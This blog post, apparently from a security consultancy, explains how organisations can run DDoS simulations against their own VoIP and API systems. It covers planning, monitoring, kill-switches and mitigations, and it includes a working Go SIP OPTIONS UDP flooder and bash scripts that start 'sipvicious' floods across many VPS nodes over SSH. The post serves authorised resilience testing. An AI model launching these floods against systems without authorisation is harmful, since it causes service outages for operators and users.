TL;DR
A DDoS simulation is a practical exercise that many organisations are capable of running. Understand why you would want to do this, then combine custom and off-the-shelf attack tools. Follow the best practices, apply solutions and mitigations, and you can finally answer: what if we got attacked?
Introduction
In this post, we give an overview of how you too can perform your own distributed denial of service (DDoS) simulation exercises. We focus on attacking real-time communications systems because this is an area where DoS attacks can really cause damage, but the instructions and ideas outlined here apply to any system that you might need to test. Although this article does not focus on the defensive side of protecting against DoS, the ultimate goal is to design and implement solutions that actually work for the systems and applications that need to be protected.
If you would rather watch a presentation or go through the slides, we gave a talk on this very topic at TADSummit 2023 in Portugal. The video can be watched on YouTube, and the slides are also available here.
Why would you want to attack your own services?
The answer surely has to be that this is a great way to have some dangerous fun! It is indeed an entertaining thing to do and can lead to some interesting and often unexpected results.
Seriously though, the real reason tends to be finding out how your critical services are going to react during a DDoS attack. The exercise that we are about to describe might be an important part of the answer to the question: what if we got attacked? The aim is to create a system that can, with reasonable effort, withstand most attacks that might be launched against your business.
If no security protection is in place for DoS, then you might want to see how dangerous this is for your particular business. How bad does it get? A DDoS simulation exercise will give you an answer.
In many cases where service availability is critical, organisations will have some form of protection mechanism. Either that, or they will rely on technologies that are able to withstand such attacks. It is often a matter of a hybrid approach with some things being better protected than others. In such cases, you will want to do such an exercise to find out which protection mechanisms actually work. Protection mechanisms are often in place but rarely ever properly tested. Until you test, you should really not make any assumptions as to their robustness. What often happens, unfortunately, is that service providers find out about their weaknesses during an actual attack. This is far from ideal - you can certainly do better by simulating such attacks.
Another very good reason is to evaluate a security solution that claims to protect against DDoS attacks. How well does it work? Perhaps you are comparing two or more solutions - which one works better in your situation? A DDoS simulation will provide some important answers there.
Finally, almost all DoS protection mechanisms fail at some point. Perhaps the security solution looks for particular patterns, but the attacks can be modified slightly leading to a bypass. Or network traffic bursts are not handled well by the security mechanisms in place. Or the attack can be slow enough to bypass protection mechanisms that rely on blocking high packet rates. Every organisation has limitations - bandwidth, system resources, application efficiency and bugs. The point is to understand if your current protection level is sufficient against the current state of affairs. And also - to understand how well your people can handle such an attack. What sort of incident response capabilities do you have?
A threat modelling approach can help here. You need to identify:
- what are your most critical services?
- are they exposed to DDoS attacks?
- what do you need to do to protect against these attacks?
Preparing for destruction
Once you have convinced yourself as to why you should simulate a DDoS attack, it is time to start making preparations for such a test.
Firstly, one has to decide what to attack and what sort of attacks to simulate. For example, you are likely to have to choose between or combine the following:
- bandwidth saturation
- protocol specific attacks
- application attacks
If you are attacking specific applications you will want to do some initial tests to explore which parts of that application should be attacked. In general, you may want to look for:
- errors, especially if generated during fuzzing
- slow responses
- increase in memory consumption (even if it is a slight increase)
For example, if your target is an API or even a SIP server, you are very likely to simply flood the target with POST or REGISTER messages. But if you are testing a specific application, you will want to make sure that the targeted functionality is being reached. With an API target, it might be that you are testing an API call which triggers a callback. You will want to have the full workflow fully functional and set up a callback handler. In the case of a SIP server, perhaps there is a voicemail application - you will want to call a specific number, and often will need to authenticate that call.
The next thing you’ll need is some attack tools. If your aim is to see how bandwidth saturation affects you, or to do generic protocol attacks, then standard or simple tools are often enough. What is important is that the attack tools are more efficient than the target application. Often such tools simply generate traffic, perhaps replaying messages. Two useful features to look for in attack tools are:
- rate limiting
- concurrency (especially for handling multiple sockets or connections)
It is also nice to have the ability to distribute the source IP for systems that have more than one IP assigned to them. And it is great when tools offer flexibility, through the combination of different techniques. For example, a tool can offer the option of closing the connection on sending (or receiving) each message versus keeping the connection open. Such a tool may also have the ability to use various different SIP or HTTP methods.
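To make the two features listed above more concrete, here is a minimal sketch of rate limiting combined with concurrency. It is an illustration under our own assumptions rather than the code of any particular tool: `runWorkers`, `measure` and the `send` callback are hypothetical names, and `send` stands in for whatever actually writes a message to the target.

```go
package main

import (
	"context"
	"fmt"
	"sync"
	"sync/atomic"
	"time"
)

// runWorkers starts `workers` goroutines that all receive from one shared
// ticker, so the combined rate is at most `perSecond` calls to send, no
// matter how many workers there are. It returns once ctx is cancelled.
func runWorkers(ctx context.Context, workers, perSecond int, send func()) {
	if workers <= 0 || perSecond <= 0 {
		return
	}
	interval := time.Second / time.Duration(perSecond)
	if interval <= 0 {
		return // rate too high to express as a ticker interval
	}
	ticker := time.NewTicker(interval)
	defer ticker.Stop()

	var wg sync.WaitGroup
	for i := 0; i < workers; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for {
				select {
				case <-ctx.Done():
					return
				case <-ticker.C:
					send() // each tick is delivered to exactly one worker
				}
			}
		}()
	}
	wg.Wait()
}

// measure runs the workers for `millis` milliseconds with a counting
// callback (hypothetical stand-in for real traffic) and returns the count.
func measure(millis, workers, perSecond int) int64 {
	ctx, cancel := context.WithTimeout(context.Background(),
		time.Duration(millis)*time.Millisecond)
	defer cancel()

	var sent int64
	runWorkers(ctx, workers, perSecond, func() { atomic.AddInt64(&sent, 1) })
	return atomic.LoadInt64(&sent)
}

func main() {
	fmt.Println("calls made in 500ms at 100/s:", measure(500, 4, 100))
}
```

Sharing one ticker keeps the overall rate fixed while the number of workers changes, which makes it easier to reason about how much traffic a single node generates. A ticker drops ticks when no worker is ready, so the configured rate is an upper bound rather than a guarantee.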
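The following is an example of such a tool, written in Go, that floods a SIP target with OPTIONS messages:
package main

import (
	"log"
	"net"
)

// flood opens a single UDP socket to the target and sends the same SIP
// OPTIONS message over it in a tight loop, discarding any responses.
func flood() {
	payload := "OPTIONS sip:demo.sipvicious.pro SIP/2.0\r\n" +
		"Content-Length: 0\r\n\r\n"
	// Dial once, outside the loops; dialling inside an endless loop would
	// leak sockets and goroutines until the process runs out of descriptors.
	c, err := net.Dial("udp", "demo.sipvicious.pro:5060")
	if err != nil {
		log.Fatal(err)
	}
	defer c.Close()
	// Read loop: drain responses into a buffer owned by this goroutine.
	go func() {
		b := make([]byte, 1024)
		for {
			c.Read(b)
		}
	}()
	// Write loop: errors are deliberately ignored, as in a simple flooder.
	for {
		c.Write([]byte(payload))
	}
}

func main() {
	flood()
}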
The same code can be changed to run the same attack using 100 concurrent goroutines:
package main

// ...

func flood() {
	payload := "OPTIONS sip:demo.sipvicious.pro SIP/2.0\r\n" +
		"Content-Length: 0\r\n\r\n"
	// ...
}

func main() {
	// Start 100 concurrent flooders, then block forever so main does not exit.
	for i := 0; i < 100; i++ {
		go flood()
	}
	select {}
}
The attack tool is not the only thing you need. You will also need control tools to do the following:
- distribute the attack tools
- start the attack
- stop the attack
One may use something like Terraform to distribute the attack tools. Starting and stopping the attack tools can then be done over SSH. Although this is not the best option, it is a good start. One thing to keep in mind is that the ability to stop the attack should be failsafe. If the attack machine is no longer reachable by the person doing the tests, the attack cannot be stopped, which might lead to real downtime for the target and an actual incident! So it is important to have a kill-switch or backup method so that the attack can always be turned off.
Here’s an example of how one can start an attack tool using a VPS API and SSH:
#!/bin/bash
# Start the attack tool on every node, in the background.
for ip in $(vps-cli vps list --format ipv4 --json | jq -r '[.[][][]] | join(" ")'); do
    ssh "root@${ip}" sipvicious sip dos flood udp://demo.sipvicious.pro:5060 &
done
Similarly, the attack tools can be stopped as follows:
#!/bin/bash
# Stop the attack tool on every node.
for ip in $(vps-cli vps list --format ipv4 --json | jq -r '[.[][][]] | join(" ")'); do
    ssh "root@${ip}" killall sipvicious &
done
Then there is the actual kill-switch:
#!/bin/bash
# Kill-switch: shut down every attack node through the VPS API.
for id in $(vps-cli vps list --format id --json | jq -r '[.[][]] | join(" ")'); do
    vps-cli vps shutdown "${id}"
done
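The kill-switch above depends on the VPS API being reachable from wherever the tester is. One additional safeguard, which we sketch here as an assumption rather than as a description of any existing tool, is for the attack tool to carry its own deadline so that it stops even if nobody can reach it. `runWithDeadline` and its parameters are hypothetical names, and `step` stands in for one unit of work.

```go
package main

import (
	"context"
	"fmt"
	"time"
)

// runWithDeadline calls step repeatedly until maxMillis milliseconds have
// passed, then stops on its own. It returns how many times step ran.
func runWithDeadline(maxMillis int, step func()) int {
	ctx, cancel := context.WithTimeout(context.Background(),
		time.Duration(maxMillis)*time.Millisecond)
	defer cancel()

	count := 0
	for {
		select {
		case <-ctx.Done():
			// Deadline reached: stop without needing any outside command.
			return count
		default:
			step()
			count++
		}
	}
}

func main() {
	// Stand-in workload: each step just sleeps for 10ms.
	n := runWithDeadline(200, func() { time.Sleep(10 * time.Millisecond) })
	fmt.Println("stopped by itself after", n, "steps")
}
```

The deadline is only checked between steps, so a step that blocks for a long time delays the stop. This complements the external kill-switch and does not replace it.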
Finally, you will need attack nodes. These are the systems from which to launch your distributed attacks.
Word of caution: if you are using third-parties, you will want to make sure that this activity is allowed and that other customers are not going to be impacted. This is especially a concern in the case of bandwidth saturation.
Here are some options:
- VPS - which you might choose due to ease of getting started and distributing the attacks over a large number of nodes for a relatively low price
- VMs - which can be useful for internal tests done in a lab environment
- Bare metal servers - which are great for attacks that consume bandwidth or require decent resources, but are naturally more expensive
Once you have these different components in place, you will want to prepare your monitoring systems. It is important to monitor your bandwidth usage. Sometimes when attacking a particular protocol or application, even if the purpose is not to saturate bandwidth, the result is that the bandwidth is saturated. We even wrote a blog post about this here: Why volumetric DDoS cripples VoIP providers and what we see during pentesting.
Therefore, monitor your bandwidth at the target level and at the attack node level too.
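As a rough illustration of the arithmetic behind bandwidth monitoring, the sketch below turns two readings of an interface byte counter into a rate and a link utilisation figure. The function names and the sample readings are our own assumptions; how you obtain the counters depends on your platform and monitoring stack.

```go
package main

import "fmt"

// mbps converts two readings of a byte counter, taken intervalSeconds
// apart, into megabits per second.
func mbps(prevBytes, curBytes uint64, intervalSeconds float64) float64 {
	if intervalSeconds <= 0 || curBytes < prevBytes {
		return 0 // invalid interval, or the counter was reset
	}
	bits := float64(curBytes-prevBytes) * 8
	return bits / intervalSeconds / 1e6
}

// utilisation returns the fraction of the link capacity in use.
func utilisation(rateMbps, linkMbps float64) float64 {
	if linkMbps <= 0 {
		return 0
	}
	return rateMbps / linkMbps
}

func main() {
	// Hypothetical readings: 125,000,000 bytes transferred in 10 seconds.
	rate := mbps(1_000_000_000, 1_125_000_000, 10)
	// Prints: 100 Mbit/s, 10% of a 1 Gbit/s link
	fmt.Printf("%.0f Mbit/s, %.0f%% of a 1 Gbit/s link\n",
		rate, utilisation(rate, 1000)*100)
}
```

Running the same calculation on both the target and the attack nodes helps to tell whether a plateau in traffic is caused by the target's link or by the attack nodes themselves.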
If you are targeting a particular application, you will want to monitor the application itself and the underlying system resources. Profiling can be a useful tool when debugging specific issues. That is, having the ability to switch profiling on during such a test can be really beneficial.
One thing that we should not forget is the people: the engineers and members of staff, possibly from several different teams, who need to be involved and monitor the target system. If you are going to do your tests on a live system, you will want to do such tests during off-peak hours. Therefore, the right people need to be booked and advised well ahead of time.
And finally, the test environment. You will need a place to test and if you’re doing this on a non-production environment, it is important that it is as similar to production as possible.
One more thing - you need a plan.
You will need to figure out each particular test to be done, ahead of time. Each step in the plan could increase in complexity. This allows you to start with the easier tests that might show problems that need to be resolved before more complex tests are done.
Running the tests
What do you need to do during the actual tests?
You will need to start monitoring. Specifically monitor the following:
- bandwidth
- application
- system resources
- dependencies such as databases
The target system should also be monitored through a pinger, which is a tool that periodically simulates legitimate traffic (e.g. every second). Although a failing pinger usually indicates major problems, it might miss more subtle issues.
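A pinger can be quite small. The following is a minimal sketch under our own assumptions, not the pinger from our platform: `ping`, `failures`, `sample` and `errNoResponse` are hypothetical names, and the probe is injected as a function so that it can be a SIP OPTIONS request, a test call or an HTTP request depending on the target.

```go
package main

import (
	"errors"
	"fmt"
	"time"
)

// errNoResponse is what the stand-in probe returns when it "fails".
var errNoResponse = errors.New("no response")

// sample records the outcome of one probe.
type sample struct {
	ok      bool
	latency time.Duration
}

// ping runs probe count times, waiting interval between attempts, and
// records whether each attempt succeeded and how long it took.
func ping(count int, interval time.Duration, probe func() error) []sample {
	if count <= 0 {
		return nil
	}
	results := make([]sample, 0, count)
	for i := 0; i < count; i++ {
		start := time.Now()
		err := probe()
		results = append(results, sample{ok: err == nil, latency: time.Since(start)})
		if i < count-1 {
			time.Sleep(interval)
		}
	}
	return results
}

// failures counts the probes that did not succeed.
func failures(results []sample) int {
	n := 0
	for _, r := range results {
		if !r.ok {
			n++
		}
	}
	return n
}

func main() {
	// Stand-in probe that fails on every third call; a real probe would
	// send legitimate traffic to the target and wait for the response.
	calls := 0
	probe := func() error {
		calls++
		if calls%3 == 0 {
			return errNoResponse
		}
		return nil
	}
	results := ping(6, 10*time.Millisecond, probe)
	fmt.Printf("%d of %d probes failed\n", failures(results), len(results))
}
```

Recording latency as well as success helps with the more subtle issues: a target that still answers, but more slowly than before the test started, is easy to miss if you only count failures.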
[Video: a demo showing our own attack platform that we use to do such tests]
So when things break, you should get notified through monitoring. At this point you should stop and assess. In fact, the real work during this exercise starts here. This can take a while, and some of it might be done later in a more targeted retest, but it is important to try to understand the root cause.
Finally, you should start creating some documentation and reports.
Best practices for running DDoS simulations
Which brings us to the best practices part. Here are 6 best practices to post on your wall if you decide to go through with a DDoS simulation:
- Try to automate as much as possible. For example, capturing of the monitoring results (from the pinger) and bandwidth statistics could be automated
- Have a real-time communication channel with the engineers (we often use Google Meet)
- Work with the engineers not against them - collaborate, don’t compete
- Test your tests ahead of time! i.e. do your own QA
- Start documenting the results (which can be semi-automated); otherwise you might forget what actually happened
- Set a fixed scope and fixed timeframe - know your limits (we stick to a maximum of 2 hours, which is already quite tiring)
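As an example of the kind of automation mentioned in the first point, monitoring results can be written to a CSV file as the test runs, so that they are ready for the report afterwards. This is only a sketch: the `record` fields, the column names and `toCSV` are assumptions of ours, and the sample values are made up.

```go
package main

import (
	"encoding/csv"
	"fmt"
	"strconv"
	"strings"
)

// record is one row of monitoring data (hypothetical layout).
type record struct {
	second    int     // seconds since the test started
	pingerOK  bool    // did the pinger get a valid response?
	latencyMs float64 // pinger latency in milliseconds
	mbps      float64 // bandwidth measured at the target
}

// toCSV renders the records as CSV text with a header row.
func toCSV(records []record) (string, error) {
	var sb strings.Builder
	w := csv.NewWriter(&sb)
	if err := w.Write([]string{"second", "pinger_ok", "latency_ms", "mbps"}); err != nil {
		return "", err
	}
	for _, r := range records {
		row := []string{
			strconv.Itoa(r.second),
			strconv.FormatBool(r.pingerOK),
			strconv.FormatFloat(r.latencyMs, 'f', 1, 64),
			strconv.FormatFloat(r.mbps, 'f', 1, 64),
		}
		if err := w.Write(row); err != nil {
			return "", err
		}
	}
	w.Flush()
	return sb.String(), w.Error()
}

func main() {
	out, err := toCSV([]record{
		{second: 0, pingerOK: true, latencyMs: 12.5, mbps: 40},
		{second: 1, pingerOK: false, latencyMs: 1000, mbps: 950},
	})
	if err != nil {
		fmt.Println("error:", err)
		return
	}
	fmt.Print(out)
}
```

A file like this also makes it easier to line up the moment the pinger started failing with what the bandwidth graphs showed at the same second.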
What happens after the fact?
You probably end up with a number of findings. What happens next?
It really depends on your findings, but generally one should perform root cause analysis. This might have started during the actual exercise but should probably be continued and allocated proper time. This involves debugging applications, reviewing logs and so on.
Once the root cause of each finding is determined, solutions or mitigation techniques should be discussed. We have seen many engineers just jumping to solutions without proper assessment. The thing is that solutions need to be practical. They should actually address the problems that were identified, and they should not introduce new problems that might prevent legitimate users from accessing the systems.
Then, the solutions or mitigation techniques can be implemented. Here are some examples that we have seen:
- an outdated logging library was leading to locks; updating it would have solved the problem (but dependency hell!)
- changes in application configuration that can work wonders
- rate limiting solutions
- application code changes (often done as a result of profiling)
One caveat to keep in mind is that real solutions rarely consist of buying more resources.
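To illustrate what a rate limiting solution can look like, here is a minimal per-source token bucket. We are not claiming that this is what any of the systems we tested deployed; it is one common technique, and `limiter`, `newLimiter` and `allow` are hypothetical names. Time is passed in as seconds to keep the sketch deterministic.

```go
package main

import "fmt"

// bucket holds the tokens currently available to one source.
type bucket struct {
	tokens float64
	last   float64 // time of the last update, in seconds
}

// limiter is a per-source token bucket. It is not safe for concurrent use
// and never evicts old sources; a real deployment would need both.
type limiter struct {
	rate    float64 // tokens added per second
	burst   float64 // maximum tokens a source can accumulate
	buckets map[string]*bucket
}

func newLimiter(rate, burst float64) *limiter {
	return &limiter{rate: rate, burst: burst, buckets: make(map[string]*bucket)}
}

// allow reports whether a message from source, arriving at time now
// (in seconds), should be processed or dropped.
func (l *limiter) allow(source string, now float64) bool {
	b, ok := l.buckets[source]
	if !ok {
		b = &bucket{tokens: l.burst, last: now}
		l.buckets[source] = b
	}
	// Refill according to the time elapsed, capped at the burst size.
	if elapsed := now - b.last; elapsed > 0 {
		b.tokens += elapsed * l.rate
		if b.tokens > l.burst {
			b.tokens = l.burst
		}
		b.last = now
	}
	if b.tokens < 1 {
		return false
	}
	b.tokens--
	return true
}

func main() {
	l := newLimiter(1, 2) // 1 message per second, bursts of up to 2
	for _, t := range []float64{0, 0, 0, 1} {
		fmt.Printf("t=%.0fs allowed=%v\n", t, l.allow("192.0.2.10", t))
	}
}
```

A limiter like this needs to be retested just like any other solution. An attack that stays under the per-source rate, or that is spread across many sources, will pass straight through it.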
Finally, you will want to update your documentation to include details about your solutions. And then, you should test the solution again and find out if it works and where it might fail. This is where you create a feedback loop and keep improving your system.
Moving forward towards more robust systems
By doing your own DDoS simulations, you actually learn a great deal about your system. You no longer need to guess whether you will handle a real attack when it does happen. Having a security solution in place does not necessarily mean that it will withstand adversity.
There is one more thing. Because no security solution is perfect, don’t forget that incident response, disaster recovery and similar areas are very important. Security is (unfortunately) often a cat and mouse game, and there is always more that can be covered and more that can be tested. The question that you’ll want to answer is “how will we handle it?”. A DDoS simulation can in fact help you get to that answer.
Rather have us do all the work?
At Enable Security, we offer DDoS simulation as a service. We also help our clients do their own tests through our consultancy service. However, this usually only makes sense as a collaborative exercise since feedback from the stakeholders is critical when doing such a test. If you would like to learn more, do get in touch through our contact page.